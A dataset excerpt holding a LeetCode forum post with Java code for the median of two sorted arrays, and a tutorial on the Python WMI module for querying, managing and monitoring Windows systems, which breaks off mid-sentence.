text
stringlengths
454
608k
url
stringlengths
17
896
dump
stringclasses
91 values
source
stringclasses
1 value
word_count
int64
101
114k
flesch_reading_ease
float64
50
104
Using the idea of merge sort. Stack is used for the sake of easier to find the mid element. The time/space cost for this idea might not be the best, however, it's really straightforward and easier to understand. public class Solution { public double findMedianSortedArrays(int[] nums1, int[] nums2) { int len1 = nums1.length; int len2 = nums2.length; boolean isEven = (len1+len2)%2==0; Stack<Integer> stack = new Stack<Integer>(); int i1 = 0, i2 = 0; //saving current smaller element into stack, //till stack.size() > average number of elements --->find the mid point //and the stack.peek() 1 or 2 elements can be used for calculating the average for nums1 and nums2 while(i1<len1||i2<len2){ if(i1>=len1||i2>=len2){ //nums1 or nums2 numbsers are running out if(i1<len1) { stack.push(nums1[i1]); i1++; }else{ stack.push(nums2[i2]); i2++; } }else{ //push the smaller element in nums1[i1], nums2[i2] if(nums1[i1]>nums2[i2]){ stack.push(nums2[i2]); i2++; }else{ stack.push(nums1[i1]); i1++; } } if(stack.size() > (len1+len2)/2){ if(isEven){//n is avg # of elements, n-1 not in stack, n+1 in stack return (stack.pop()+stack.pop())/2.0; }else{// n not in stack, n+1 in stack return stack.pop(); } } } return 0; } @davidthinkle.ding Hello,there is something that i don't understand,if the one is 4,5,6,the other one is 1,it should be4.5,isn't?but I get 5.5 ,so I want to ask Why? Isn't What I understand is wrong? @davidthinkle.ding Seems the time complexity to be O(m+n), rather than O(log(m+n))
https://discuss.leetcode.com/topic/61034/straightforward-idea-of-merge-sort-easy-to-understand
CC-MAIN-2017-47
refinedweb
275
61.33
17477/pod-status-terminating-kubernentes I was trying to delete a replication controller with 15 pods and few of the pods got stuck at terminating status. whats the issue? Force delete the pod: kubectl delete pod --grace-period=0 --force --namespace <NAMESPACE> <PODNAME> Delete the finalizers block from resource (pod,deployment,ds etc...) yaml: "finalizers": [ "foregroundDeletion" ] It’s not able to schedule anything because ...READ MORE I learned this the hard way, but ...READ MORE I had the same issue, struggled for days. ...READ MORE The issue caused by the docker was having the same issue. In the ...READ MORE I’m not very sure of this error. ...READ MORE OR Already have an account? Sign in.
https://www.edureka.co/community/17477/pod-status-terminating-kubernentes?show=17480
CC-MAIN-2019-43
refinedweb
117
76.32
, I talked about how steno could be used by people who speak with voice synthesizers, making it easy to communicate in English at true conversational speeds using only their fingers. In this part I want to talk about the benefit of steno in prose composition. I'm currently writing this on a qwerty keyboard on a subway train (the A down to Hoyt-Schirmerhorn in Brooklyn, if you're interested) because there isn't room to use my steno machine and my laptop's keyboard isn't antighosting, so I can't use Plover (which also needs a file output option before it will be anything more than a demo. Planning to get on that very soon.) I'm typing out every letter of every word I want to write, plus spaces between each word. Though I make my living writing in steno, I still use qwerty for a lot of things, because my $4,000 proprietary steno software isn't much good as a keyboard replacement and because my steno machine isn't always immediately to hand. I'm pretty used to it; before I learned steno, I worked for several years as a qwerty transcriptionist, and I can type at around 110 words per minute. Even so, whenever I switch to qwerty, it feels so clumsy and plodding. It's not all that great for my wrists either, but I'll write more about that later, in the section on using steno to avoid repetitive stress injuries. Mainly it's just such an inefficient input mechanism. I already know the word I want to write when I type the first letter, but instead of moving on to the next word, I have to spend however many more fractions of a second typing out the rest of the letters, then pressing space, then starting on the second word. It artificially slows down my thinking and forces a staccato note into whatever I'm writing. Steno, by contrast, is quick, clean, and smooth. Many famous writers composed their works in pen shorthand, including Samuel Pepys, Astrid Lindgren (author of the Pippi Longstocking books), and Charles Dickens, whose work as a London court reporter probably had a lot to do with his matchless ear for dialogue. The trouble with pen shorthand, though, is that it needs to be transcribed manually, which few modern writers have the patience for. Machine steno, on the other hand, can produce digital text three times more efficiently than the best qwerty typist can type; but I don't know of any authors who use a steno machine in their work. This is almost certainly due to the high cost of the equipment and software, coupled with a general lack of knowledge about the benefits of steno. Steno is an unparalleled method of text input, especially for high-volume work, where fluency of thought is vitally important. Writers and programmers would seem to profit the most from it, considering the amount of time they spend putting words up on a screen. If you're only interested in programming, skip down three paragraphs. If you're a writer, keep reading. I think this applies equally to essayists, bloggers, science writers, business writers, and the rest of the gamut, but most of my experience has been as an intermittent writer of amateur fiction, so I'll use that as a template to extrapolate from. I'm sorry to say that I don't get the chance to do much writing for most of the year, but I'm a longtime participant in National Novel Writing Month, the yearly ordeal in which otherwise sane people try to write 50,000 words of fiction in 30 days, just for the fun of it. I've attempted it four times and won it twice. The first time I won, I was living with my parents after college and working the graveyard shift in a group home, where my duties involved about three hours of actual work and five hours of sitting on a couch keeping watch over a house full of peacefully sleeping people. I wiped my November clean of social engagements and devoted nearly every waking hour in November to my novel. It was a terrible piece of writing, but after sweating and moaning and suffering untold tortures, I wrote the last of my 50,000 words and declared victory just shy of the December 1st deadline. Six years later, I won again, but my circumstances had changed. In that time, I had moved to New York City, learned steno, and found my own apartment. I was supporting myself and my partner with my CART business, plus working weekends as a theater captioner and picking up a bit of transcription on the side. I didn't have the luxury to sweat and moan over a novel; if I wanted to write, I had to do it between CART gigs. There's no way I could have done it without steno. Every day, between one job and another, I'd haul my gear to the Square Root Cafe and bang out a couple of chapters between bites of grilled cheese sandwich. It wasn't great writing by a long shot, but it flowed in a way that I'd never experienced before. Every word my characters said to me came up on the screen as quickly as they could have spoken them. Before, in the time it took me to type out the six or seven letters that made up each word, my brain would cloud over and I would start second-guessing myself so much it was a mighty battle even to get to the end of a sentence. With steno, most words came in a single stroke, so my text was able to keep ahead of my doubts and excuses and just keep going. I could write for half an hour on the subway going home, or pull out my gear and do a quick 10 minutes in the park before schlepping onward to my next gig. Before, I would have told myself that I didn't have time to get anything substantial done in those few scattered intervals, that I needed several solid hours to get into the flow and mood of writing. After learning steno, I couldn't get away with that ploy. Before I knew it, my 10 minutes were over, but I'd managed to fill half a dozen pages. It wasn't even the speed that helped me do it, primarily; it was the fluency that steno gave to my thinking. The cover of my 2008 NaNovel. Switching suddenly from fiction to programming might make for a weird transition, but it's one I've made myself over the past year, so it bears mentioning. This November, instead of attempting NaNo again, I decided to find a Python tutor to help me develop this idea for an open source steno program that had been fighting to get out of my head for several years already. Part of the frustration was that, try as I might, I was never able to make my steno software work effectively with Vim, my favorite text editor. Even when writing fiction, the 1.5-second time delay built into Eclipse's buffer drove me crazy. In the program itself, it lets me see my words instantly (in a sort of distorted "preview mode" that I have to turn off when I'm CARTing, because it's too distracting to my clients), but when I piped its output to other programs, the delay was there not only when I tried to write using steno, but when I tried to edit or navigate around the document as well. I still haven't managed to find a good solution to programming using the steno keyboard, but I can see so clearly what it might be like, if only the software were properly designed. Programming is especially suited for steno, because there's so much boilerplate to write again and again, even in an eloquent language like Python. If I want to define a function, I have to type: def someFunction(arg): stuff. That's eight strokes just to get started, plus 20 more strokes to write "someFunction", "arg", and "stuff". In steno, on the other hand, you could write something like D*FD in a single stroke, and it would put in the def, the space, the parentheses, the colon and the carriage return automatically, then jump you up to the space after the def to write your function name and arguments, then then drop you back down to the body of the function, all in four strokes. Best of all, once you defined that function name in your steno dictionary, you wouldn't need to worry about remembering to write out the name in camel case each time. Just use a single stroke like SPHU*PBGS (pronounced "smunction"), for instance, and start thinking of it as just another word, instead of two words mashed together in a lexically unnatural way. I love the way Vim has mapped a useful command to each key of the qwerty keyboard. It's immensely powerful once you get used to it. But it's only got 26 keys to choose from, and it takes a long time to learn which key does what, since the correlation between "move one word forward" and the "w" key is pretty abstract and arbitrary. In steno, you could certainly keep using just the w key, if it's what you're used to, but you could also, say, map the "move one word forward" command to a single stroke like "WOFRD" (pronounced "woffered"). That's mnemonically much more useful than just "w", and an even bigger advantage is that the number of possible one-stroke commands is almost infinite. Instead of one stroke equalling one letter, steno lets one stroke equal one syllable, which is about five times more efficient quantitatively. As a qualitative improvement, the advantage is inestimable. Mark Twain, one of the first professional authors to buy a typewriter, said: "The machine has several virtues. I believe it will print faster than I can write. One may lean back in his chair and work it. It piles an awful stack of words on one page. It don't muss things or scatter ink blots around." Mr. Clemens was a forward-thinking man, and qwerty was a remarkable innovation for its time. It's been responsible for over a century of great prose and programming. But everything he says there goes for steno too -- plus a whole lot more besides..
http://plover.stenoknight.com/2010/04/writing-and-coding-with-steno.html
CC-MAIN-2018-17
refinedweb
1,771
63.93
On Wed, Apr 10, 2019 at 12:44 AM Mark Thompson <sw at jkqxz.net> wrote: > > On 09/04/2019 23:14, Baptiste Coudurier wrote: > > --- > > libavcodec/h264_parse.c | 2 +- > > libavcodec/h264_parser.c | 2 +- > > libavcodec/h264_ps.c | 4 ++-- > > libavcodec/h264_ps.h | 4 ++-- > > libavcodec/h264dec.c | 6 +++--- > > 5 files changed, 9 insertions(+), 9 deletions(-) > > > > diff --git a/libavcodec/h264_ps.c b/libavcodec/h264_ps.c > > index 17bfa780ce..980b1e189d 100644 > > --- a/libavcodec/h264_ps.c > > +++ b/libavcodec/h264_ps.c > > @@ -330,8 +330,8 @@ void ff_h264_ps_uninit(H264ParamSets *ps) > > ps->sps = NULL; > > } > > > > ) > > { > > AVBufferRef *sps_buf; > > int profile_idc, level_idc, constraint_set_flags = 0; > > diff --git a/libavcodec/h264_ps.h b/libavcodec/h264_ps.h > > index e967b9cbcf..d422ce122e 100644 > > --- a/libavcodec/h264_ps.h > > +++ b/libavcodec/h264_ps.h > > @@ -149,8 +149,8 @@ typedef struct H264ParamSets { > > /** > > * Decode SPS > > */ > > ); > > Making the H.264 decoder's internal SPS and PPS structures fixed API really doesn't feel like a good idea to me, but I admit I don't have a better answer to the problem you're facing. Copying everything is also pretty terrible. Adding a new API to parse the headers and return the information you want might be nicer considering just this change, but extensibility for the inevitable subsequent patch which wants some extra piece of information in future would be a big pain. > > If you're going to go with this, please add namespace prefixes to the structures it affects ("SPS" and "PPS", since you're now including them in code which isn't explicitly H.264), and also add big warnings to the header indicating that the structures are now fixed and can't be modified at all except on major bumps. (Though maybe wait for other comments before actually making any changes.) > I agree that I really don't like exporting these functions. For example, this function takes an AVCodecContext. Its reasonable to assume when touching this function right now that its a valid AVCodecContext with a valid H264Context inside of it. Apparently right now its only used for logging, so some crazy cast appears to work, but in the future? Internal decoder functionality has no place being exported, it puts too many limits in place for future changes. Either the API needs to be wrapped in a proper external interface, leaving our internal interface open to changes, or a simplified version should be implemented in avformat, like we already did for a bunch of other video formats as it was required. The SPS isn't that complex tbh, so maybe implementing a simplified parser for mxf might be the best option. - Hendrik
http://ffmpeg.org/pipermail/ffmpeg-devel/2019-April/242406.html
CC-MAIN-2021-10
refinedweb
422
65.73
Sometimes it is useful to add some programmability to your projects, so that a user can change or add logic. This can be done with VBScript and the like, but what fun is that when .NET allows us to play with the compiler? Obviously, your compiled "script" is going to be much faster than interpreted VBScript or Jscript. I'll show you how to compile VB.NET into an assembly programmatically, in memory, then use that code right away. The demo project is a simple windows application. Here in the article I'll describe how to call a static function; the included project also has example of creating an instance of an object and accessing that instance's properties and methods. The namespaces we'll need for compiling are in System.dll, so they'll be available in a default project in Visual Studio. Now drag some controls onto the form - you'll need a textbox for the code, a compile button, and a listbox to show your compile errors. They're called txtCode, btnCompile, and lbErrors, respectively. I know, you never get compile errors, but your users might. :-) For this demo I'll just put a sample class in the form when it loads. Here is the part of the class definition that I'll use in this article; the demo project has more functionality. Public Class Sample Public Shared Function StaticFunction(ByVal Arg As String) As String Return Arg.ToUpper() End Function ... End Class Now we get to the fun part, and it's surprisingly easy. In the compile button's click handler, the following bit of code will compile an assembly from the sample code. Dim provider As Microsoft.VisualBasic.VBCodeProvider Dim compiler As System.CodeDom.Compiler.ICodeCompiler Dim params As System.CodeDom.Compiler.CompilerParameters Dim results As System.CodeDom.Compiler.CompilerResults params = New System.CodeDom.Compiler.CompilerParameters params.GenerateInMemory = True 'Assembly is created in memory params.TreatWarningsAsErrors = False params.WarningLevel = 4 'Put any references you need here - even you own dll's, if you want to use one Dim refs() As String = {"System.dll", "Microsoft.VisualBasic.dll"} params.ReferencedAssemblies.AddRange(refs) Try provider = New Microsoft.VisualBasic.VBCodeProvider compiler = provider.CreateCompiler results = compiler.CompileAssemblyFromSource(params, txtCode.Text) Catch ex As Exception 'Compile errors don't throw exceptions; you've got some deeper problem... MessageBox.Show(ex.Message) Exit Sub End Try That's it, we're ready to compile! First, though, I want to see any compile errors that my - ahem - user's incorrect code has generated. The CompilerResults object gives me plenty of information, including a list of CompilerError objects, complete with the line and character position of the error. This bit of code adds the errors to my listbox: lbErrors.Items.Clear() Dim err As System.CodeDom.Compiler.CompilerError For Each err In results.Errors lbErrors.Items.Add(String.Format( _ "Line {0}, Col {1}: Error {2} - {3}", _ err.Line, err.Column, err.ErrorNumber, err.ErrorText)) Next Now I want to do something with my compiled assembly. This is where things start to get a little tricky, and the MSDN sample code doesn't help as much. Here I'll describe how to call the the static (shared) function StaticFunction. Sorry about the semantic confusion, I transitioned from MFC... A member variable in the form class will hold the compiled assembly: Private mAssembly As System.Reflection.Assembly The assembly is retrieved from the CompilerResults object, at the end of the btnCompile_Click function: ... If results.Errors.Count = 0 Then 'No compile errors or warnings... mAssembly = results.CompiledAssembly End If I put a couple of text boxes on my form for the function argument and result. To call the static is called by the following code in the test button's click handler: Dim scriptType As Type Dim instance As Object Dim rslt As Object Try 'Get the type from the assembly. This will allow us access to 'all the properties and methods. scriptType = mAssembly.GetType("Sample") 'Set up an array of objects to pass as arguments. Dim args() As Object = {txtArgument.Text} 'And call the static function rslt = scriptType.InvokeMember("StaticFunction", _ System.Reflection.BindingFlags.InvokeMethod Or _ System.Reflection.BindingFlags.Public Or _ System.Reflection.BindingFlags.Static, _ Nothing, Nothing, args) 'Return value is an object, cast it back to a string and display If Not rslt Is Nothing Then txtResult.Text = CType(rslt, String) End If Catch ex As Exception MessageBox.Show(ex.Message) End Try The key thing here is the InvokeMember call. You can find the definition in MSDN, so I won't go into too much detail. The arguments are as follows: BindingFlags.InvokeMethod,) and what type of thing we're looking for - BindingFlags.PublicOr'd with BindingFlags.Static, which is a function declared as Public Sharedin VB.NET. Be careful to get these flags right; if they don't accurately describe the desired function, InvokeMemberwill throw a MissingMethodexception. Binderobject; this can be used to perform type conversion for arguments, among other things, but you can get by without it. Nothing. The demo code adds buttons for creating an instance of the Sample class and accessing a property and method of that instance. Have fun with it! In this example I keep the assembly in a member variable, but that's not strictly necessary. If you use it to create an instance of the class you want to use, and hang onto the Type object and your instance, you can let the assembly go out of scope. The framework also includes CSharpCodeProvider and JScriptCodeProvider classes, which can be used to compile code written in those languages. The latter is in Microsoft.JScript.dll. I think I remember reading somewhere that only the JScript compiler was implemented in the 1.0 version of the framework, and the MSDN documentation of these classes says "Syntax based on .NET Framework version 1.1." However, I had no trouble dropping this code into a VS 2002 project and running it. If anyone has a problem doing that or can clarify what the differences are between the two framework versions, it would be nice to note these in a revision to this article. General News Question Answer Joke Rant Admin
http://www.codeproject.com/KB/vb/DotNetCompilerArticle.aspx
crawl-002
refinedweb
1,035
59.09
I'll start by discussing the data type that Access offers to support storing files: the Ole Object data type. OLE (Object Linking and Embedding) is the technology that the Office suite of products use to assist with sharing files across applications. For example, when you insert a picture in a Word document, OLE comes into play. When you see Excel spreadsheets embedded in a Word doc, again, it's the result of OLE. Finally, if you download the sample Northwind database, you will see the worst possible quality images of the sales people appear on the Employees form: This is also OLE at work. OLE servers are applications which are responsible for converting original files into something that OLE can work with. Taking something like a jpeg or gif, the OLE Server responsible will reformat the file and possibly increase its overall size by up to 100 times to make it work with OLE. It will often reduce quality markedly. The application that displays the result must understand the format, and the correct OLE servers must be in place to decode the database field content. To cap it all, there is a performance overhead required in encoding and decoding OLE's proprietory format. All of this goes to make OLE totally unsuitable for files to be used in web applications. It is also OLE that has helped give Access a poor reputation when it comes to storing images or files within it. The OLE Object field is also happy to accept Long Binary Data, which is basically a BLOB (Binary Large OBject). Being a byte-for-byte copy of the original file, the BLOB is easy to extract and present in its original form over HTTP, but not so easy within the Access application itself. For this demonstration, I have taken the Northwind sample database and added a few fields to the Employees table. There is already an OLE Object field for Photo, and to this I add the following: PhotoFileName TEXT PhotoMime TEXT Resume OLE Object ResumeFileName TEXT ResumeMime TEXT The fields with "Mime" in their name will be used to store the content-type of the file. Browsers look at this property to decide how to treat an HTTP response. If the MIME type is one that they know, they will either display the content inline (where they are set up to do so, such as with text/html or image/gif) or they will invoke the default application for the known MIME type (e.g MS Word for application/msword). Finally, if they do not know what do to, they present the Save/Open dialogue box. The next step is to create an Employee Entry page, so that users can create a new employee, and upload an image and a Resume (or CV as we call them in Rome): <%@ Page <html xmlns=""> <head runat="server"> <title></title> <style type="text/css"> body{font-family: tahoma;font-size: 80%;} .row{clear: both;} .label{float: left;text-align: right;width: 150px;padding-right: 5px;} </style> </head> <body> <form id="form1" runat="server"> <div> <div class="row"> <span class="label"><label for="FirstName">First Name: </label></span> <asp:TextBox</asp:TextBox> </div> <div class="row"> <span class="label"><label for="Surname">Surname: </label></span> <asp:TextBox</asp:TextBox> </div> <div class="row"> <span class="label"><label for="Photo">Photo: </label></span> <asp:FileUpload </div> <div class="row"> <span class="label"><label for="Resume">Resume: </label></span> <asp:FileUpload </div> <div class="row"> <span class="label"> </span> <asp:Button </div> </div> </form> </body> </html> I've used a bit of CSS to style this and the result looks like this: All of the action takes place in the Button1_Click event in the code-behind: protected void Button1_Click(object sender, EventArgs e) { if (PhotoUpload.HasFile && ResumeUpload.HasFile) { Stream photoStream = PhotoUpload.PostedFile.InputStream; int photoLength = PhotoUpload.PostedFile.ContentLength; string photoMime = PhotoUpload.PostedFile.ContentType; string photoName = Path.GetFileName(PhotoUpload.PostedFile.FileName); byte[] photoData = new byte[photoLength - 1]; photoStream.Read(photoData, 0, photoLength); Stream resumeStream = ResumeUpload.PostedFile.InputStream; int resumeLength = ResumeUpload.PostedFile.ContentLength; string resumeMime = ResumeUpload.PostedFile.ContentType; string resumeName = Path.GetFileName(ResumeUpload.PostedFile.FileName); byte[] resumeData = new byte[resumeLength - 1]; resumeStream.Read(resumeData, 0, resumeLength); string qry = "INSERT INTO Employees (FirstName, LastName, Photo, PhotoFileName, PhotoMime, Resume, ResumeFileName, ResumeMime) VALUES (?,?,?,?,?,?,?,?)"; string connect = "Provider=Microsoft.Jet.OleDb.4.0;Data Source=|DataDirectory|Northwind.mdb"; using (OleDbConnection conn = new OleDbConnection(connect)) { OleDbCommand cmd = new OleDbCommand(qry, conn); cmd.Parameters.AddWithValue("", FirstName.Text); cmd.Parameters.AddWithValue("", Surname.Text); cmd.Parameters.AddWithValue("", photoData); cmd.Parameters.AddWithValue("", photoName); cmd.Parameters.AddWithValue("", photoMime); cmd.Parameters.AddWithValue("", resumeData); cmd.Parameters.AddWithValue("", resumeName); cmd.Parameters.AddWithValue("", resumeMime); conn.Open(); cmd.ExecuteNonQuery(); } } The two upload controls are checked for the presence of a file each, and then the contents of the files are read into byte arrays, and their content types and names are obtained. These along with the first name and last name are passed into the parmeters before the whole lot is inserted into the database. Having got the files there, some way is needed to retrieve them and deliver them to the browser. A Generic Handler is a good option for this. I decided to create two: one for the Resume and one for the Photo. You might be tempted to combine both tasks into one handler. I'm only going to show the Resume handler, because apart from the SQL and the data fields, all the code is the same as the PhotoHandler: <%@ WebHandler Language="C#" Class="ResumeFileHandler" %> using System; using System.Data.OleDb; using System.Web; public class ResumeFileHandler : IHttpHandler { public void ProcessRequest(HttpContext context) { string qry = "SELECT Resume, ResumeFileName, ResumeMime FROM Employees WHERE EmployeeID = ?"; string connect = "Provider=Microsoft.Jet.OleDb.4.0;Data Source=|DataDirectory|Northwind.AddHeader("content-disposition", "attachment; filename=" + rdr["ResumeFileName"]); context.Response.ContentType = rdr["ResumeMime"].ToString(); context.Response.BinaryWrite((byte[])rdr["Resume"]); } } } } } public bool IsReusable { get { return false; } } } A generic handler (.ashx file) implements IHttpHandler, which enforces 2 methods - ProcessRequest() and IsReusable. All the action takes place in ProcessRequest. I'm passing in the EmployeeID via the querystring, which should tell you that ASP.NET will serve requests to files ending in .ashx. The code obtains the values for the file name, and content type, and then sets the response headers accordingly, before finally streaming the file as an array of bytes. An example page which lets the user get the files is as follows: <form id="form1" runat="server"> <div> <a href="ResumeFileHandler.ashx?ID=12">Get Resume</a> <br /> <img src="ImageFileHandler.ashx?ID=12" alt="" /> </div> </form> To provide access to the Resume, a simple hyperlink is all that's needed. The file is delivered when the user clicks the link. The image, on the the hand, has it's src pointing to the filehandler. When the html for the page is first sent to the browser, it then looks at other "resources" that the page needs, and requests them one by one. The src attribute of the img tag points to the location of one of these resources. Storing files as byte arrays in Access is a lot more efficient than embedding OLE objects. If you site is one that needs to serve a relatively small amount of users in an Intranet, this approach may serve you well. However, as I said at the beginning of the article, the preferred option is to store a filename in the database and the files on disc. I debated whether I should provide guidance on what I believe to be the wrong way to manage files with Access, but I see requests for help on this quite often. However, if you have no choice about how you work, for example because you have to deal with a legacy database with files already in it, hopefully this article will have provided you with some help. 8 Comments - jared - Vishal But i wuld like to know the method to change the photo of an employee in future if he/she wis to do so? Please help! - zelio - Hans_V byte[] photoData = new byte[photoLength-1]; byte[] resumeData = new byte[resumeLength-1]; - Mike Good spot! I have amended the code accordingly. - Brian Is the code for the Button1_click stored in the same file as the as the main html form page AccessUpload.aspx? Or are you saving it as a seperate file and using it as an include file? If you have a completed demo file I can look at, that would be great. I am just trying to convert as much as my Classic ASP to VB or C# but need a clearer reference. Thanks - Mike The button_click code is usually in the code behind file - unless you are not using code behind files in which case it will go in the @lt;script block at the top of your web form. Having said that, with your background you might be better off using the Web Pages framework rather than Web Forms. Here's an example of how to do the same thing with a SQL Compact database and Razor Web Pages: - Karthekeyan A S
http://www.mikesdotnetting.com/article/123/storing-files-and-images-in-access-with-asp-net
CC-MAIN-2016-44
refinedweb
1,519
54.42
From the Wikipedia entry for WMI: Windows Vista, Windows Server 2003, Windows XP, Windows Me, and Windows 2000. This tutorial covers accessing WMI specifically using the Python programming language and assumes you have downloaded and installed Python itself, the pywin32 extensions and the WMI Python module. Python is able to use WMI by means of COM-enabling packages such as Mark Hammond’s pywin32 extensions or the comtypes spinoff from Thomas Heller’s ctypes. The WMI module assumes that the pywin32 extensions are present, and exposes a slightly more Python-friendly interface to the sometimes messy WMI scripting API. NB it does nothing but wrap pywin32 functionality: if WMI under pywin32 is too slow, this module won’t be any faster. We’re not really going to be looking at what you can do with WMI in general, except by way of demonstrating some functionality within the module. There are no few examples around the web of what you can do with the technology (and you can do most things with it if you try hard enough). Some links are at the bottom of the document. Most of the time, you’ll simply connect to the local machine with the defaults: import wmi c = wmi.WMI() If you need to connect to a different machine, specify its name as the first parameter: import wmi c = wmi.WMI("other_machine") The most common thing you’ll be doing with WMI is finding out about various parts of your system. That involves determining which WMI class to interrogate and then treating that as an attribute of the Python WMI object: import wmi c = wmi.WMI() for os in c.Win32_OperatingSystem(): print os.Caption. There are some helpful links at the bottom of this document, but I often simply stick “WMI thing-to-do” into my search engine of choice and scan the results for convincing answers. Note that, although there is only, in this case, one Operating System, a WMI query always returns a list, possibly of one item. The items in the list are wrapped by the Python module for attribute access. In this case, the Win32_OperatingSystem class has several attributes, one of which is .Caption, which refers to the name of the installed OS. WMI has the concept of events. There are two types, intrinsic and extrinsic, which are discussed below. The Python module makes the difference as transparent as it can. Say you wanted to track new processes starting up: import wmi c = wmi.WMI() process_watcher = c.Win32_Process.watch_for("creation") while True: new_process = process_watcher() print new_process.Caption Note that you must pass one of “creation”, “deletion”, “modification” or “operation” to the .watch_for method. If not, slightly odd errors will result. New in version 1.3.1: If you don’t specify a notification type to an intrinsic event then “operation” will be assumed, which triggers on any change to an object of that class. Some, but by no means all, WMI classes allow for the possibility of writing information back. This you do by setting attributes as usual in Python. Note that the class may let you do this without complaint even though nothing useful has happened. To change the display name of a service, for example, you need to call the service’s .Change method. You can update the displayName attribute directly without error, but it will have no effect. The most typical place in which you’ll set an attribute directly is when you’re creating a whole new object from a class’s .new method. In that case you can either set all the parameters as keyword arguments to the .new call or you can specify them one by one afterwards. Some WMI classes have methods to operate on them. You can call them as though they were normal class or instance methods in Python. From version 1.3.1, parameters can be positioned; before that, they must be named. If you wanted to stop the (running) RunAs service, whose short name is “seclogon”: import wmi c = wmi.WMI() for service in c.Win32_Service(Name="seclogon"): result, = service.StopService() if result == 0: print "Service", service.Name, "stopped" else: print "Some problem" break else: print "Service not found" The basics of what can be done with the WMI module is covered above and this is probably as far as many people need to go. However, there are many slight subtleties to WMI and you may find yourself studying a VBS-oriented example somewhere on the web and thinking “How do I do this in Python?”. The .connect function(aliased as .WMI) has quite a few parameters, most of which are optional and can safely be ignored. For the majority of them, I would refer you to the MS documentation on WMI monikers into which they slot fairly straightforwardly. We will introduce here a few of the more common requirements. This is the most common and the most straightforward extra parameter. It is the first positional parameter or the one named “computer”. You can connect to your own computer this way by specifying nothing, a blank string, a dot or any of the computer’s DNS names, including localhost. But usually you just don’t need to pass the parameter at all. To connect to the WMI subsystem on a computer named “MachineB”: import wmi c = wmi.WMI("MachineB") This is the second most common need and is fairly straightforward, but with a few caveats. The first is that, no matter how hard you try to obfuscate, you can’t connect to your local computer this way. The second is this technique doesn’t always play well with the many layers of WMI security. More on that below in troubleshooting. To connect to a machine called “MachineB” with username “fred” and password “secret”: import wmi c = wmi.WMI("MachineB", user=r"MachineB\fred", password="secret") WMI classes are organised into a namespace hierarchy. The majority of the useful ones are under the cimv2 namespace, which is the default. But add-on providers may supply extra namespaces, for example MicrosoftIISv2 or DEFAULT/StdRegProv. To use a different namespace from the default(which is, incidentally, not the one named default!) specify it via the namespace parameter. All namespaces are assumed to start from root so it need not be specified, although if you want to specify the root namespace itself, you can do: import wmi c = wmi.WMI(namespace="WMI") In some cases you want to be able to pass the full moniker along, either because the moniker itself is so complex, or because you want to be able to cut-and-paste from elsewhere. In that case, pass the moniker as a string via the “moniker” parameter: import wmi c = wmi.WMI( moniker="winmgmts:{impersonationLevel=impersonate,(LockMemory, !IncreaseQuota)}" ) A special case of the full moniker is that it can be used to connect directly to a WMI class or even a specific object. The Python module will notice that the moniker refers to a class or object and will return the wrapped object directly rather than a namespace. Any WMI object’s path can be used as a moniker to recreate it, so to attach directly to the Win32_LogicalDisk class, for example: import wmi logical_disk = wmi.WMI(moniker="//./root/cimv2:Win32_LogicalDisk") This is equivalent to getting hold of the class through the normal mechanism although it’s mostly of use internally to the module and when translating examples which use the technique. Access to a specific object is similar and slightly more useful: import wmi c_drive = wmi.WMI(moniker='//./root/cimv2:Win32_LogicalDisk.DeviceID="C:"') This object is the same as you’d have received by querying against the Win32_LogicalDisk in the cimv2 namespace with a parameter of DeviceID=”C:” so from the point of view of the Python module is not so very useful. However it is a fairly common usage in VBS examples on the web and eases translation a little. We’ve already seen this in action above; I just didn’t comment on it at the time. When you “call” a WMI class, you can pass along simple equal-to parameters to narrow down the list. This filtering is happening at the WMI level; you can still do whatever post-hoc filtering you want in Python once you’ve got the values back. Note that, even if the resulting list is only one element long, it is still a list. To find all fixed disks: import wmi c = wmi.WMI() for disk in c.Win32_LogicalDisk(DriveType=3): print disk By default, all fields in the class will be returned. For reasons of performance or simply manageability, you may want to specify that only certain fields be returned by the query. This is done by setting the first positional parameter to a list of field names. Note that the key field (typically an id or a unique name or even a combination) will always be returned: import wmi c = wmi.WMI() for disk in c.Win32_LogicalDisk(["Caption", "Description"], DriveType=3): print disk If you want to carry out arbitrary WMI queries, using its pseudo-SQL language WQL, you can use the .query method of the namespace. To list all non-fixed disks, for example: import wmi c = wmi.WMI() wql = "SELECT Caption, Description FROM Win32_LogicalDisk WHERE DriveType <> 3" for disk in c.query(wql): print disk Intrinsic events occur when you hook into a general event mechanism offered by the WMI system to poll other classes on your behalf. You can track the creation, modification or deletion of any WMI class. You have to specify the type of event (creation, deletion, modification or simply operation to catch any type) and give a polling frequency in whole seconds. After those parameters, you can pass along keyword parameters in the normal way to narrow down the events returned. Note that, since this is polling behind the scenes, you do not want to use this to, say, monitor an entire directory structure. To watch an event log for errors, say: import wmi c = wmi.WMI(privileges=["Security"]) watcher = c.Win32_NTLogEvent.watch_for("creation", 2, Type="error") while 1: error = watcher() print "Error in %s log: %s" % (error.Logfile, error.Message) # send mail to sysadmin etc. A caveat here: this is polling, and at the frequency you’ve specified. It is possible to miss events this way. The return from a watcher is in fact a special _wmi_event object, subclass of a conventional _wmi_object, and which includes, for intrinsic events, the event type, timestamp and previous value for a modification as attributes: _wmi_event.event_type, _wmi_event.timestamp and _wmi_event.previous respectively. Note that, while “Win32_NTLogEvent” ends in “Event”, it is not in fact an extrinsic event. You can tell which classes are extrinsic events by examining their derivation and looking for __ExtrinsicEvent: import wmi c = wmi.WMI() print c.Win32_PowerManagementEvent.derivation() Alternatively, you can go top down and look for subclasses of __ExtrinsicEvent: import wmi c = wmi.WMI() for i in c.subclasses_of("__ExtrinsicEvent"): print i You use extrinsic events in much the same way as intrinsic ones. The difference is that any event type and delay are ignored since WMI isn’t polling on your behalf, but waiting on the underlying subsystem. The return from the watcher is still a _wmi_event object (1.3.1) but without the extra information, which isn’t supplied by WMI. Suppose you wanted to do something whenever your computer came out of standby, eg to notify an IM group of your presence: import wmi import datetime c = wmi.WMI() watcher = c.Win32_PowerManagementEvent.watch_for(EventType=7) while True: event = watcher() print "resumed" # # Number of 100-ns intervals since 1st Jan 1601! # TIME_CREATED doesn't seem to be provided on Win2K # if hasattr(event, "TIME_CREATED"): ns100 = int(event.TIME_CREATED) offset = datetime.timedelta(microseconds=ns100 / 10) base = datetime.datetime(1601, 1, 1) print "Resumed at", base + offset For an intrinsic modification event, you could compare the before and after values of the trigger instance: import wmi c = wmi.WMI() watcher = c.Win32_Process.watch_for("modification") event = watcher() print "Modification occurred at", event.timestamp print event.path() prev = event.previous curr = event for p in prev.properties: pprev = getattr(prev, p) pcurr = getattr(curr, p) if pprev != pcurr: print p print " Previous:", pprev print " Current:", pcurr But there’s more! Although 